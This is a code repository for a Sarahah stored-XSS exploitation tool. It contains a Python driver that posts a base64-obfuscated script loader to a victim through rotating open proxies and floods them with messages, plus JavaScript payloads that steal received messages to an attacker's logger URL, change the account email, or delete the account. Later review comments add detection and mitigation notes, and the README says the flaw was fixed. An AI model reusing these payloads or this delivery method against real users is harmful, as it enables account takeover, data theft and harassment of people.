├── README.md ├── exploits ├── accountdelete.js ├── emailchange.js └── readmessage.js ├── log.php ├── proxy.lst └── sarahah.py /README.md: -------------------------------------------------------------------------------- 1 | # Sarahah XSS Exploitation Tool 2 | 3 | The tool was able to: 4 | 5 | 1. Read Victim's Messages 6 | 2. Change Victim's Email 7 | 3. Delte Victim's Account 8 | 9 | Note: The vulnerability was reported and is now fixed. 10 | 11 | Article: www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html 12 | Video: https://www.youtube.com/watch?v=dTv5G2ciZ6E 13 | 14 | [![Sarahah XSS Exploitation Tool](https://img.youtube.com/vi/dTv5G2ciZ6E/0.jpg)](https://www.youtube.com/watch?v=dTv5G2ciZ6E) 15 | -------------------------------------------------------------------------------- /exploits/accountdelete.js: -------------------------------------------------------------------------------- 1 | /* 2 | ____ _ _ 3 | / ___| __ _ _ __ __ _| |__ __ _| |__ 4 | \___ \ / _` | '__/ _` | '_ \ / _` | '_ \ 5 | ___) | (_| | | | (_| | | | | (_| | | | | 6 | |____/ \__,_|_| \__,_|_| |_|\__,_|_| |_| 7 | Sarahah XSS Exploitation Script 8 | Coded by Shawar Khan ( www.shawarkhan.com ) 9 | */ 10 | // Account Delete Exploit Code 11 | // Params Required: None 12 | 13 | document.getElementsByClassName('col-xs-3')[0].innerHTML=""; 14 | function d4rk(){; 15 | var MyIFrame = document.getElementById("myframe"); 16 | var MyIFrameDoc = (MyIFrame.contentWindow || MyIFrame.contentDocument); 17 | MyIFrameDoc = MyIFrameDoc.document; 18 | MyIFrameDoc.forms[1].submit(); 19 | MyIFrame.onload=null;} 20 | -------------------------------------------------------------------------------- /exploits/emailchange.js: -------------------------------------------------------------------------------- 1 | /* 2 | ____ _ _ 3 | / ___| __ _ _ __ __ _| |__ __ _| |__ 4 | \___ \ / _` | '__/ _` | '_ \ / _` | '_ \ 5 | ___) | (_| | | | (_| | | | | (_| | | | | 6 | |____/ \__,_|_| \__,_|_| |_|\__,_|_| |_| 7 | Sarahah XSS 
Exploitation Script 8 | Coded by Shawar Khan ( www.shawarkhan.com ) 9 | */ 10 | // Email Change Exploit code 11 | // Params Required: email 12 | 13 | document.getElementsByClassName('col-xs-3')[0].innerHTML=""; 14 | function d4rk(){; 15 | var MyIFrame = document.getElementById("myframe"); 16 | var MyIFrameDoc = (MyIFrame.contentWindow || MyIFrame.contentDocument); 17 | MyIFrameDoc = MyIFrameDoc.document; 18 | MyIFrameDoc.getElementsByClassName('form-control')[1]['value'] = email; 19 | MyIFrameDoc.getElementsByClassName('form-horizontal')[0].submit(); 20 | MyIFrame.onload=null;} 21 | -------------------------------------------------------------------------------- /exploits/readmessage.js: -------------------------------------------------------------------------------- 1 | /* 2 | ____ _ _ 3 | / ___| __ _ _ __ __ _| |__ __ _| |__ 4 | \___ \ / _` | '__/ _` | '_ \ / _` | '_ \ 5 | ___) | (_| | | | (_| | | | | (_| | | | | 6 | |____/ \__,_|_| \__,_|_| |_|\__,_|_| |_| 7 | Sarahah XSS Exploitation Script 8 | Coded by Shawar Khan ( www.shawarkhan.com ) 9 | */ 10 | // Message Capturing Exploit Code 11 | // Params Required: username,logger 12 | 13 | for(var i=0;i<10;i++){ 14 | var xhr = new XMLHttpRequest(); 15 | var url = 'https://'+document.domain+'/Messages/GetReceivedMessagePage?page='+i 16 | console.log(url); 17 | xhr.open('GET', url, true); 18 | xhr.onload = function () { 19 | var data = 'message='+this.responseText; 20 | if(this.responseText!='[]'){ 21 | var xhr1 = new XMLHttpRequest(); 22 | xhr1.open('POST',logger+'?username='+username); 23 | xhr1.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); 24 | xhr1.onload=function(){ 25 | console.log(':)'); 26 | }; 27 | xhr1.send(data); }; 28 | } 29 | xhr.send(); 30 | } 31 | -------------------------------------------------------------------------------- /log.php: -------------------------------------------------------------------------------- 1 | 12 | 
--------------------------------------------------------------------------------
/proxy.lst:
--------------------------------------------------------------------------------
163.172.163.140:3128
149.56.46.234:8080
77.81.229.6:8080
62.138.16.87:3128
203.74.4.7:80
203.74.4.2:80
203.74.4.3:80
219.76.4.12:88
77.81.229.6:8080
5.135.195.166:3128
123.30.238.16:3128
--------------------------------------------------------------------------------
/sarahah.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Python 2 script (print statements, raw_input, cookielib/urllib2): the
# interactive driver for the stored-XSS proof of concept described in
# README.md, which also states the issue was reported and has been fixed.
#
# Request pattern, for anyone triaging server or proxy logs:
#   * one unproxied GET of https://<victim>.sarahah.com to scrape the
#     anti-forgery token, the RecipientId hidden input and Set-Cookie;
#   * 25 rounds of POSTs to /Messages/SendMessage, each round rotated through
#     the open proxies in proxy.lst until one answers "Done"; the first
#     accepted POST carries the payload, the later ones a ":)" filler;
#   * the payload is a base64-wrapped one-line script loader (exploit())
#     that pulls one of exploits/*.js into the victim's session.
# Output-encoding message text and a CSP that disallows dynamically injected
# script are the standard mitigations for this class of bug.
print "[+] Importing Modules..."
import json
import sys
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Every HTTPS call below passes verify=False (certificate checking is off);
# this line only silences the warning urllib3 would print for each of them.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import glob
from base64 import b64encode
import os
# sys, urllib, ssl, cookielib and urllib2 are imported but never used in
# this file.
import urllib
import ssl
import cookielib
import urllib2
try:
    print " Importing BeautifulSoup module..."
    from BeautifulSoup import BeautifulSoup   # BeautifulSoup 3 API
except ImportError:
    from bs4 import BeautifulSoup             # fall back to bs4

# Clear the terminal before printing the banner.
if os.name=='nt':
    os.system('cls')
else:
    os.system('clear')

print '''
____ _ _
/ ___| __ _ _ __ __ _| |__ __ _| |__
\___ \ / _` | '__/ _` | '_ \ / _` | '_ \
___) | (_| | | | (_| | | | | (_| | | | |
|____/ \__,_|_| \__,_|_| |_|\__,_|_| |_|
Sarahah XSS Exploitation Script
Author: Shawar Khan ( www.shawarkhan.com )

[+] Select Option:\n\n 1. Read Victim\'s Messages\n 2. Change Victim\'s Email\n 3. Delete Victim\'s Account\n 4. View Captured Messages\n
'''

def capturedmessages():
    """Print the messages the logger previously stored for one username.

    Every *.txt file in the working directory is listed as an available user;
    after prompting for a name, the text/dateSent fields of the JSON stored in
    <username>.txt are printed.  Each stored line is expected to look like
    "<prefix>--- <json>": the part after '--- ' is taken and its first and
    last two characters are trimmed before json.loads.
    """
    users = []
    for file in glob.glob("*.txt"):
        users.append(file.split('.')[0])   # 'alice.txt' -> 'alice'
    print '\n[+] Messages Available:\n'
    for i in users:
        print ' > '+i
    username = raw_input('\n[+] Enter Username: ')
    file = username+'.txt'
    print '[+] Loading Messages of "%s"\n'%username
    f = open(file).readlines()   # file handle is never closed
    for i in f:
        # NOTE(review): parses f[0] on every iteration instead of i, so the
        # first record is printed once per line of the file -- looks like a
        # loop-variable slip.  The [1:-2] trim presumably strips a trailing
        # newline plus one delimiter; check against what log.php writes.
        data = json.loads(f[0].split('--- ')[1][1:-2])
        print ' Message: %s\n Date : %s\n'%(data['text'],data['dateSent'])

def exploit(exploitname,user,email,logpath=''):
    """Build the message body that delivers one of the three payloads.

    exploitname -- 'messageread', 'emailchange' or 'accountdelete'; any other
                   key raises KeyError from the dict lookup.
    user        -- victim username, interpolated into the messageread loader.
    email       -- new address for emailchange; base64-encoded before being
                   embedded so it needs no quoting inside the JavaScript.
    logpath     -- logger URL for messageread (default '').

    Each entry is a one-line JavaScript loader that appends a <script> whose
    src is a base64 literal decoded with atob() at run time; the literals
    appear to decode to hosted copies of the exploits/*.js files.  Because of
    that wrapping the hostname never appears literally in the stored message
    text -- when hunting for this in message data, "atob(" is the string to
    match rather than a URL.
    """
    exploits = {"messageread":'var username="%s";var logger="%s";var script = document.createElement("script");script.src = atob("aHR0cHM6Ly9jZG4ucmF3Z2l0LmNvbS9zaGF3YXJraGFuZXRoaWNhbGhhY2tlci9TYXJhaGFoLVhTUy1FeHBsb2l0L21hc3Rlci9leHBsb2l0Y29kZS9yZWFkbWVzc2FnZS5qcw==");document.getElementsByTagName("body")[0].appendChild(script);'%(user,logpath),
    "emailchange":'var email=atob("%s");var script = document.createElement("script");script.src = atob("aHR0cHM6Ly9jZG4ucmF3Z2l0LmNvbS9zaGF3YXJraGFuZXRoaWNhbGhhY2tlci9TYXJhaGFoLVhTUy1FeHBsb2l0L21hc3Rlci9leHBsb2l0Y29kZS9lbWFpbGNoYW5nZS5qcw==");document.getElementsByTagName("body")[0].appendChild(script);'%b64encode(email),
    "accountdelete":'var script = document.createElement("script");script.src = atob("aHR0cHM6Ly9jZG4ucmF3Z2l0LmNvbS9zaGF3YXJraGFuZXRoaWNhbGhhY2tlci9TYXJhaGFoLVhTUy1FeHBsb2l0L21hc3Rlci9leHBsb2l0Y29kZS9hY2NvdW50ZGVsZXRlLmpz");document.getElementsByTagName("body")[0].appendChild(script);'}
    # NOTE(review): the HTML template that embeds the base64 payload appears
    # to have been stripped by the page extraction -- the literal here is
    # empty, and '' % <one argument> raises TypeError ("not all arguments
    # converted") in Python 2.  Confirm against the original source before
    # reading anything into this line.
    return ''%b64encode(exploits[exploitname])

def sendexploit(exploitcode,victim):
    """Deliver exploitcode as an anonymous message to <victim>.sarahah.com.

    Flow: one direct GET of the profile page to scrape the anti-forgery
    token, RecipientId and cookies; then 25 rounds in which each proxy from
    proxy.lst is tried in turn until a POST to /Messages/SendMessage answers
    with "Done".  The first accepted POST carries exploitcode; every later
    round sends the filler ":)".  A proxy whose reply lacks "Done" is added
    to blockedproxies and skipped for the rest of the run.  Calls exit() if
    the profile page contains 'User Not Found'.
    """

    heds = {"User-Agent":"Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"}
    # The initial fetch is not proxied and has certificate verification off.
    r = requests.get('https://'+victim+'.sarahah.com',verify=False, headers=heds)
    s = requests.Session()   # unused: every request below is a bare requests.* call

    sourcecode = r.text
    # Raw Set-Cookie header value, re-sent verbatim as the Cookie header in
    # heds1 below (cookie attributes travel along with it).
    cookies=r.headers['Set-Cookie']
    parsed_html = BeautifulSoup(sourcecode)
    # The token is located purely by position: 5th <script>, its 26th line,
    # 4th '='-separated field, first double-quoted value.  Any change to the
    # page layout raises IndexError here.
    csrftoken = str(parsed_html.body.findAll('script')[4]).split('\n')[25].split('=')[3].split('"')[1]
    # Both lookups run before the 'User Not Found' check; if the hidden input
    # is absent, find() returns None and this line raises TypeError before
    # that message is ever printed.
    userid = parsed_html.body.find('input', attrs={'id':'RecipientId'})['value']
    if 'User Not Found' in sourcecode:
        print "[+] User Not Found!"
        exit()
    else:
        print "[+] User Found!"
        print "[+] Sending Payload..."
        # One 'host:port' entry per line; the handle is never closed.
        proxies = open('proxy.lst','r').read().splitlines()
        import json   # redundant: json is already imported at module level
        exploitstatus=''      # '' until a POST carrying exploitcode returns "Done", then 'sent'
        blockedproxies = []   # proxies that returned a non-"Done" reply; skipped afterwards
        for i in range(0,25):

            heds1 = {"User-Agent":"Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0",
                     "X-Requested-With":"XMLHttpRequest",
                     "Cookie":cookies}

            print 'Request:',i
            reqs = 'none'     # per-round flag: 'done' once one proxy succeeds
            for proxy1 in proxies:
                #print "\nUsing proxy",proxy1
                #print blockedproxies
                if proxy1 not in blockedproxies:
                    if reqs == 'done':
                        # print "Request was successfully sent!"
                        break   # this round is finished; move on to the next i
                    try:
                        ip = {'http':'http://'+str(proxy1),'https':'https://'+str(proxy1)}
                        if exploitstatus == '':
                            # Payload not accepted yet: this POST carries exploitcode.
                            #print exploitcode
                            #print 'Sending Request'
                            postdata = {"__RequestVerificationToken":csrftoken,"userId":userid,"text":exploitcode,"captchaResponse":""}
                            # posturl is a Response object despite the name.
                            posturl = requests.post('https://'+victim+'.sarahah.com/Messages/SendMessage',verify=False,proxies=ip,headers=heds1,data=postdata)
                            sourcecode2 = posturl.text
                            #print "Printing Sourcecode"
                            print sourcecode2
                            if "Done" in sourcecode2:   # server-side success marker
                                reqs = 'done'
                                exploitstatus = 'sent'
                                print '[+] Payload Sent!'
                                print '[+] Flooding Victim for payload execution...'
                                print '[i] This may take a while...'
                            else:
                                blockedproxies.append(proxy1)
                                #print 'Proxy %s Blocked'%proxy1
                                #print blockedproxies
                                pass
                        else:
                            # Payload already accepted: remaining rounds send the ":)" filler.
                            postdata = {"__RequestVerificationToken":csrftoken,"userId":userid,"text":":)","captchaResponse":""}
                            posturl = requests.post('https://'+victim+'.sarahah.com/Messages/SendMessage',verify=False,proxies=ip,headers=heds1,data=postdata)
                            sourcecode2 = posturl.text
                            print sourcecode2
                            if "Done" in sourcecode2:
                                reqs = 'done'
                            else:
                                blockedproxies.append(proxy1)
                    except Exception as e:
                        # Any transport error (proxy unreachable, timeout, TLS)
                        # is swallowed; the proxy is not added to
                        # blockedproxies on this path, so it is retried in
                        # every round.
                        #print e
                        pass
                else:
                    #print "Proxy %s Ignored!"%proxy1
                    pass
    # Printed unconditionally, even if no POST ever returned "Done".
    print "[+] User Successfully Flooded & Payload Sent."
    print "[i] Keep your logger running, wait for user to scroll and you'll get the logs."


def readmessageexploit():
    """Menu option 1: prompt for the victim and the logger URL, send the messageread payload."""
    username = raw_input("[+] Enter Victim Username > ")
    # URL that exploits/readmessage.js POSTs captured pages to (log.php in this repo).
    loger = raw_input("[+] Enter Path to Logger > ")
    #print "[i] Logger is pre-defined 'https://127.0.0.1/log.php'."
    sendexploit(exploit('messageread',username,'',loger),username)

def emailchangeexploit():
    """Menu option 2: prompt for the victim and a new address, send the emailchange payload."""
    username = raw_input("[+] Enter Victim Username > ")
    email = raw_input("[+] Enter New Email > ")
    sendexploit(exploit('emailchange',username,email),username)

def accountdeleteexploit():
    """Menu option 3: prompt for the victim, send the accountdelete payload."""
    username=raw_input("[+] Enter Victim Username > ")
    sendexploit(exploit('accountdelete',username,''),username)

def menu():
    """Read one menu choice and dispatch; recurses (not loops) on invalid input."""
    option = raw_input("[+] Options: 1,2,3,4\n Select Option > ")
    if option == "1":
        print "Read Victim's Messages"
        readmessageexploit()
    elif option == "2":
        emailchangeexploit()
    elif option == "3":
        accountdeleteexploit()
    elif option == "4":
        capturedmessages()
    else:
        print "[!] Invalid Option Selected!"
        menu()
# Runs at import time; there is no __main__ guard.
menu()
--------------------------------------------------------------------------------